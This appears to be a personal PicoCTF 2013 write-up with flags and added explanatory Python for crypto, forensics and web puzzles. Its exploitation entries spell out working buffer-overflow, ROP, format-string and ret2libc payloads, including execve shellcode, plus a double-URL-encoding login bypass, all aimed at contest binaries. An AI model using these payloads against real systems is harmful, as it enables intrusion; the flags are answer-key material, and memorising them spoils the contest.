@parksjin01
Last active July 26, 2021 22:22
PicoCTF 2013 writeup

Failure to boot

  • Googling Error 0x00000023 shows it is the Windows stop error raised by the FAT file system driver.
  • flag: FAT

Technician Challenge

  • Googling "first unlocked iPhone traded" finds the young student who hacked the iPhone and got a car as a reward.
  • flag: Nissan 350Z

Read the manual

  • It's just a Caesar cipher; decrypt it.
  • flag: idugnihnpwpw

XMLOL

  • Easy: just view the XML source in the web browser.
  • flag: 374515637751691555272132255481

First contact

  • Just open the pcap in Wireshark and follow the stream.
  • The position is 37 14'06"N 115 48'40"W
  • flag: 37 14'06"N 115 48'40"W

Trivial

  • Write a script to decrypt it.
  • flag: th4ts_w0rs3_th4n_DES
  • Script is here.

Bitwise

  • Just write a Python script to reverse it.
  • flag: ub3rs3cr3t
  • Script is here.

Space portmap

  • I was too lazy to analyze this gif, so I just recorded it as a video to read the key.
  • flag: key: Do passports let you fly interstellar?

Yummy

  • View the HTML source in the web browser.
  • It says to set a cookie like authorization=administrator.
  • flag: DX7-2

CFG to C

  • It's just an assembly problem.
  • flag: BCAD

Byte Code

  • Decompiling the class file with jd-gui returns // internal error //
  • Instead of jd-gui I used javadecompilers.com
  • flag: LBuJyIiigs

NAVSAT

  • You can download the zip file from the PicoCTF homepage, but it won't unzip.
  • The hint gives a list of file magic numbers; 03 04 are the last two bytes of the zip local file header signature (50 4B 03 04, i.e. PK\x03\x04).
  • So change the first two bytes (??) to PK and unzip. We get a pdf file and a txt file.
  • flag: Next stop Tau Eridani

RSA

  • I searched for RSA and found suitable source code to decrypt it.
  • flag: 5577446633554466577768879988
  • Script is here.
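
The decryption the author scripted, written out here as an added example (it is not the gist's script): textbook RSA from the factors p, q, the public exponent e and the ciphertext c, which is what CTF RSA challenges typically hand out. The challenge's own parameters are not on the page, so the demo uses a constructed toy key (two 30-bit primes, e = 65537) and round-trips constructed messages; the flag for this challenge was the plaintext integer itself, and int_to_text covers the other common case where ASCII is packed into the integer.

```python
import math
from typing import Tuple


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n). Raises when e is not invertible, i.e. the parameters are bad."""
    phi = (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)          # modular inverse, Python 3.8+


def rsa_encrypt(n: int, e: int, m: int) -> int:
    """Textbook (unpadded) RSA, as used by these challenges: c = m^e mod n."""
    if not 0 <= m < n:
        raise ValueError("message must be an integer below n")
    return pow(m, e, n)


def rsa_decrypt(p: int, q: int, e: int, c: int) -> int:
    """Recover m from c given the factors of n: m = c^d mod n."""
    n = p * q
    if not 0 <= c < n:
        raise ValueError("ciphertext must be an integer below n")
    return pow(c, rsa_private_exponent(p, q, e), n)


def int_to_text(m: int) -> str:
    """Flags are often ASCII packed big-endian into the message integer."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode()


# Constructed toy key (NOT the challenge's parameters): two 30-bit primes and e = 65537.
TOY_P = 1000000007
TOY_Q = 998244353
TOY_E = 65537


def demo() -> Tuple[int, str]:
    """Round-trip a constructed digit-string message and a constructed ASCII message."""
    n = TOY_P * TOY_Q
    digits = 1122334455                           # constructed numeric message, below n
    text = int.from_bytes(b"toyflag", "big")      # constructed 7-byte ASCII message, below n
    c1 = rsa_encrypt(n, TOY_E, digits)
    c2 = rsa_encrypt(n, TOY_E, text)
    return (rsa_decrypt(TOY_P, TOY_Q, TOY_E, c1),
            int_to_text(rsa_decrypt(TOY_P, TOY_Q, TOY_E, c2)))
```

With a real challenge you only call rsa_decrypt(p, q, e, c); the gcd check catches the occasional challenge where e is not coprime to phi(n) and the plain inverse does not exist.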

Spamcarver

  • Just open it in a hex editor. You can see PK, the zip file magic number.
  • I copied the hex from 0xcb8e to the end and saved it as a zip file.
  • flag: 7adf6f07e0810003c585a7be97868a90
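
A small carve-and-repair script covering both zip cases above, NAVSAT (the two PK bytes of the signature overwritten) and Spamcarver (a zip sitting at some offset inside a larger file), added here as an example and not the author's tooling. The zip local file header signature is 50 4B 03 04 (PK\x03\x04), followed by a fixed 26-byte header whose fields can be sanity-checked before trusting a match. The sample archive, the damage, and the junk prefix are all constructed in memory.

```python
import io
import struct
import zipfile
from typing import Dict, Optional

ZIP_LOCAL_HEADER = b"PK\x03\x04"     # 50 4B 03 04: signature of every zip local file header
LOCAL_HEADER_FMT = "<4sHHHHHIIIHH"    # sig, version, flags, method, time, date, crc, csize, usize, nlen, xlen
LOCAL_HEADER_LEN = struct.calcsize(LOCAL_HEADER_FMT)   # 30 bytes


def make_sample_archive() -> bytes:
    """Constructed sample: a two-entry zip built in memory (not the challenge file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", "constructed sample entry one\n")
        zf.writestr("readme.txt", "constructed sample entry two\n")
    return buf.getvalue()


def plausible_local_header(data: bytes, off: int) -> bool:
    """Sanity-check the fixed fields after a (possibly damaged) signature at off."""
    if off < 0 or off + LOCAL_HEADER_LEN > len(data):
        return False
    fields = struct.unpack_from(LOCAL_HEADER_FMT, data, off)
    method, nlen, xlen = fields[3], fields[9], fields[10]
    # stored (0) or deflated (8), a non-empty file name, and the variable part fits the buffer
    return method in (0, 8) and 0 < nlen < 256 and off + LOCAL_HEADER_LEN + nlen + xlen <= len(data)


def repair_zip_headers(data: bytes) -> bytes:
    """NAVSAT case: 'PK' overwritten but the trailing 03 04 intact. Restore 'PK' wherever
    the bytes around a 03 04 still look like a local file header."""
    buf = bytearray(data)
    pos = 0
    while (i := buf.find(b"\x03\x04", pos)) != -1:
        pos = i + 1
        off = i - 2
        if off >= 0 and buf[off:i] != b"PK" and plausible_local_header(bytes(buf), off):
            buf[off:i] = b"PK"
    return bytes(buf)


def carve_zip(data: bytes) -> Optional[bytes]:
    """Spamcarver case: cut from the first local file header to end of file. Central
    directory offsets are relative to the archive start, so dropping the prefix suffices."""
    off = data.find(ZIP_LOCAL_HEADER)
    return None if off == -1 else data[off:]


def read_entries(data: bytes) -> Dict[str, bytes]:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def demo() -> Dict[str, Dict[str, bytes]]:
    archive = make_sample_archive()
    damaged = b"??" + archive[2:]          # what the NAVSAT download looked like
    embedded = b"spam" * 64 + archive      # a zip buried after junk, as in Spamcarver
    return {
        "repaired": read_entries(repair_zip_headers(damaged)),
        "carved": read_entries(carve_zip(embedded)),
    }
```

Note that zipfile.is_zipfile() only looks for the end-of-central-directory record, so it still says True for the damaged file; the failure only shows up when an entry is read, which is why the repair is checked by actually extracting.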

Client-side is the best side

Robomunication

  • Listening to the mp3, we hear only two tones, "bee" and "boo".
  • This is Morse code, and we can decode it by googling a Morse table.
  • flag: BOOPBEEP

Python-eval1

  • Read the HTML doc first. It tells you the input method and the formula applied to the input.
  • If we make y / 6 + 7 - y == x, the comparison holds, so I input that.
  • x: 0, y: (42-6*(ord(flag[0])*ord(flag[1])))/5
  • flag: eval_is_best_thing_evar

Second contact

  • I couldn't figure out how to solve this one, so I googled it.
  • Analyzing the pcap in Wireshark, you can see he is reading a magazine article about the stack.
  • I couldn't find a flag in the capture itself; the flag was the author of the article.
  • flag: Aleph One

DDOS Detection

  • Opening the pcap in Wireshark, you can see strange packets.
  • Clients send packets to the server but the server never responds.
  • I can't be sure whether they are attackers or victims, but I guess they're the attackers.
  • flag: Them

PHP2

  • They are really kind: they publish the PHP source code for the page.
  • If the id parameter is 'admin', authentication succeeds.
  • But an ereg() check rejects id == admin, so we can't send it directly. After the ereg check, the code urldecodes the parameter again.
  • If we URL-encode 'admin' twice, %2561%2564%256d%2569%256e, the server's decode yields %61%64%6d%69%6e, which passes the check, and the script's second decode turns it into admin, so we get the key.
  • flag: b4cc845aa05ed9b0ce823cb04f253e27
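
A Python model of the double-decoding bug, added here as an example (it is not the challenge's PHP): the web server decodes the query string once before the script sees it, the script rejects a literal admin with a regex (assumed here to mirror the page's ereg() test), and then decodes a second time before comparing, so the check and the comparison see different strings. The fixed version checks and compares the same string. The three request values are constructed.

```python
import re
from typing import Callable, Dict
from urllib.parse import unquote


def server_receives(raw_query_value: str) -> str:
    """The web server / PHP runtime URL-decodes the query string once before $_GET is populated."""
    return unquote(raw_query_value)


def vulnerable_auth(id_param: str) -> bool:
    """Model of PHP2: reject a literal 'admin' (assumed shape of the page's ereg() check),
    THEN urldecode again and compare. The second decode after validation is the bug."""
    if re.fullmatch(r"admin", id_param):
        return False
    decoded_again = unquote(id_param)
    return decoded_again == "admin"


def fixed_auth(id_param: str) -> bool:
    """Decode exactly once (the server already did) and run check and comparison on the
    same string; the encoded forms never turn into 'admin' after the check."""
    if re.fullmatch(r"admin", id_param):
        return False
    return id_param == "admin"


# Constructed request values: 'admin' plain, URL-encoded once, URL-encoded twice.
PAYLOADS = {
    "plain": "admin",
    "single": "%61%64%6d%69%6e",
    "double": "%2561%2564%256d%2569%256e",
}


def run(auth: Callable[[str], bool]) -> Dict[str, bool]:
    """Send every payload through the server's decode and the given auth function."""
    return {name: auth(server_receives(value)) for name, value in PAYLOADS.items()}
```

Only the double-encoded value gets through vulnerable_auth: one decode is spent by the server, the regex sees %61%64%6d%69%6e, and the script's own unquote() produces admin. The general rule is to canonicalize input once and validate that canonical form; any decode that happens after the check reopens the bypass.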

avaJ

  • Hahaha, Java again. Just use the same website we used for the Byte Code problem.
  • flag: iT6chiweTohy4oot

hotcoffe

  • Hahaha, Java again. Same website again.
  • flag: n0th1ng_1s_saf3

overflow1

  • It's a really easy problem. Set the 65th byte to 1.
  • Like this: $(python -c 'print "a"*64+"\x01"')
  • flag: overflow_is_best_flow

rop1

  • With ASLR turned on, the heap, stack and other mapped regions move every run.
  • However, the code segment of this non-PIE binary doesn't move, and it contains functions we can return to.
  • payload: (python -c 'print "a"*0x8c+"\xa4\x84\x04\x08"';cat) | ./rop1
  • flag: I couldn't get a shell, so I don't know the flag.

Eval python2

  • Typing flag[i:i+5] leaks the flag five characters at a time.
  • flag: i_are_a_pyeval_mastermind

format1

  • Just use the format string bug; it's an easy problem.
  • payload: (python -c 'print "\x2a\xa0\x04\x08"*2+"%10x"*9+"%262046c"+"%n"';cat) | ./format1
  • flag: I couldn't get a shell, so I don't know the flag.
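
The arithmetic behind the format1 payload above, as an added example rather than the author's script: %n stores the number of characters printf has emitted so far, so the width of the %c conversion is chosen so that address bytes + the chars from the %10x conversions + the padding equals the target value modulo 2^32. Each %10x prints exactly 10 characters (a 32-bit value has at most 8 hex digits), the %c consumes one copy of the address as its argument and %n consumes the other as its pointer, which is why the address appears twice. The target 0x40000 is what the page's numbers add up to (8 + 90 + 262046); the page does not state it. The stand-in stack values are constructed.

```python
import struct
from typing import Tuple


def fmt_write_payload(addr: int, target: int, skip_words: int,
                      word_width: int = 10) -> Tuple[bytes, int]:
    """Build [addr]*2 + '%<w>x'*skip_words + '%<pad>c' + '%n' and return (payload, pad).

    The %x conversions walk printf's argument pointer up the stack until the next argument
    is the first copy of addr (eaten by %c); %n then takes the second copy as its pointer
    and stores the running character count there.
    """
    prefix = struct.pack("<I", addr) * 2
    printed = len(prefix) + skip_words * word_width   # chars emitted before the %c
    pad = (target - printed) % 2**32                  # wrap so the count lands on target
    fmt = (b"%%%dx" % word_width) * skip_words + (b"%%%dc" % pad) + b"%n"
    return prefix + fmt, pad


def chars_printed_before_n(payload: bytes, stack_words: Tuple[int, ...]) -> int:
    """Cross-check: render everything before %n with Python's % operator, which follows the
    same width rules as C printf for %x and %c, and count the output. stack_words stand in
    for whatever printf finds on the stack; their values don't change the count."""
    body = payload.decode("latin-1")
    first_pct = body.index("%")
    raw, fmt = body[:first_pct], body[first_pct:body.index("%n")]
    n_hex = fmt.count("x")
    if len(stack_words) < n_hex:
        raise ValueError("need a stand-in value for every %x")
    args = tuple(stack_words[:n_hex]) + ("A",)   # 'A' stands in for the %c argument
    return len(raw) + len(fmt % args)
```

For the page's numbers, fmt_write_payload(0x0804a02a, 0x40000, 9) reproduces the payload byte for byte with pad = 262046. Writing a value smaller than the characters already printed is handled by the modular wrap, at the cost of a very large (but still valid) width; the usual answer is to split the write into %hn halves, which this block does not cover.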

overflow2

  • Really easy too, similar to overflow1.
  • payload: $(python -c 'print "aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrsssstttt\x01"')
  • flag: I couldn't get a shell, so I don't know the flag.

Evergreen

  • This is a class file, so I used javadecompilers.com

  • In the HexGame class:

    if ((s[0] == 6962645667329216838L) && (s[1] == -9213219107527098271L)
        && (s[2] == -8636705539236951775L) && (s[3] == 1301971326710323201L)) {
        System.out.println("Success! Your key is on the next line.");
        System.out.println(stateString());

  • Now I want to find the stateString() method:

    private String stateString() {
        String s = "";
        for (Hexagon[] row : this.board) {
            for (Hexagon hex : row) {
                if (hex != null) {
                    if (hex.team == 0) {
                        s = s + "1";
                    } else if (hex.team == 1) s = s + "2";
                    else s = s + "0";
                }
            }
        }
        return s;
    }

  • To compute it we need to know each hexagon's team, which is set by the serializedState method. Since the result is a function of the teams, we can recompute it from that function.

  • flag: 1202202010201002012221020011001220120001200010202100102002100001201021001010000210201002021001012000012000220200120001012020102

ROP2

  • We can solve it if we remember how arguments are passed to functions.
  • This is an x86 program, so arguments are passed on the stack.
  • The saved return address is 140 bytes into the buffer, so the dword at offset 140 becomes the return address and the value following it can serve as system()'s argument.
  • payload: (python -c 'print "\x10\x86\x04\x08"*35+"\xb1\x84\x04\x08"+"\x10\x86\x04\x08"*10';cat) | ./rop2
  • flag: I couldn't get a shell, so I don't know the flag.

Overflow3

  • It's just a simple overflow, so do it.
  • Change the saved EIP to 0x80485f8.
  • payload: $(python -c 'print "aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssss\xf8\x85\x04\x08"')
  • flag: I couldn't get a shell, so I don't know the flag.
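
Python 3 versions of the payload one-liners used in the overflow and ROP problems above, added as an example (not the author's commands): struct.pack replaces hand-typed "\xf8\x85\x04\x08" strings, the lettered filler doubles as an offset finder, and sys.stdout.buffer writes raw bytes, since Python 3's print() would not. The addresses are the ones on the page for Overflow3 (0x080485f8) and ROP2 (0x080484b1, 0x08048610); the crash-EIP value in the test is constructed.

```python
import struct
import sys


def p32(value: int) -> bytes:
    """Little-endian 32-bit pack, the byte order a dword has on the x86 stack (pwntools' p32)."""
    return struct.pack("<I", value)


def letter_pad(length: int) -> bytes:
    """'aaaabbbbcccc...' filler like the page's overflow payloads. Each 4-byte group is one
    letter, so the group that lands in EIP on a crash identifies the offset. Unique only up
    to 26 * 4 = 104 bytes; past that use a real cyclic pattern (pwntools cyclic())."""
    if length > 26 * 4:
        raise ValueError("letter filler is only unambiguous up to 104 bytes")
    groups = (bytes([ord("a") + i]) * 4 for i in range(26))
    return b"".join(groups)[:length]


def offset_from_crash_eip(eip: int) -> int:
    """Given the EIP of a crash under gdb (e.g. 0x74747474, 'tttt'), return the buffer
    offset at which the saved return address starts."""
    word = p32(eip)
    if len(set(word)) != 1 or not ord("a") <= word[0] < ord("a") + 26:
        raise ValueError("EIP does not hold a letter_pad group")
    return (word[0] - ord("a")) * 4


def ret_overwrite(ret_offset: int, ret_addr: int, tail: bytes = b"") -> bytes:
    """Overflow3 shape: filler up to the saved EIP, then the address to return to."""
    return letter_pad(ret_offset) + p32(ret_addr) + tail


def rop2_payload() -> bytes:
    """The page's ROP2 layout: 35 filler dwords (140 bytes), the return address 0x080484b1,
    then more 0x08048610 dwords, the first of which is read as system()'s argument."""
    filler = p32(0x08048610)
    return filler * 35 + p32(0x080484b1) + filler * 10


if __name__ == "__main__":
    # argv-style:  ./overflow3 "$(python3 payload.py overflow3)"
    # stdin-style: (python3 payload.py rop2; cat) | ./rop2   -- cat keeps stdin open for the shell
    which = sys.argv[1] if len(sys.argv) > 1 else "overflow3"
    data = rop2_payload() if which == "rop2" else ret_overwrite(76, 0x080485f8)
    sys.stdout.buffer.write(data + (b"\n" if which == "rop2" else b""))
```

The argv form only works while no byte of the address is 0x00 (0x080485f8 has none); a payload that must contain NUL bytes has to go through stdin, where the trailing newline ends the gets()/fgets() read and the following cat keeps the pipe open so the spawned shell can take commands.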

ROP3

  • It says that in the real contest ASLR was turned off, so I'll also turn ASLR off.
  • With ASLR off it looks like an easy overflow problem.
  • payload: (python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"a"*(0x8c-28)+"\xa0\xd5\xff\xff"';cat)
  • If you try that you won't get the flag, because NX is enabled and we can't run shellcode on the stack.
  • I'll solve it another way soon.

Overflow4

  • It's also just a simple overflow problem.
  • We don't have to bypass ASLR, so I turned ASLR off.
  • payload: $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"a"*(0x48-24)+"\x80\xd5\xff\xff"')
  • shellcode: here
  • flag: I don't know the flag because I couldn't get a shell.

Format2

  • I will overwrite the GOT entry of exit() with the address of system().
  • I have to study this more.

Overflow5

  • It's not that hard; the only difference is that no C source file is provided.
  • NX is enabled, which means we can't run shellcode on the stack.
  • So I'll call system() in libc instead.
  • ASLR was turned off at the contest, so I'll turn it off too.
  • payload: $(python -c 'print "a"*(0x568-0x140-28)+"\xa0\xcd\xe3\xf7"+"aaaa"+"\x2b\xd8\xf5\xf7"')
  • flag: I couldn't get a shell, so I don't know the flag.

Total Score = 3385
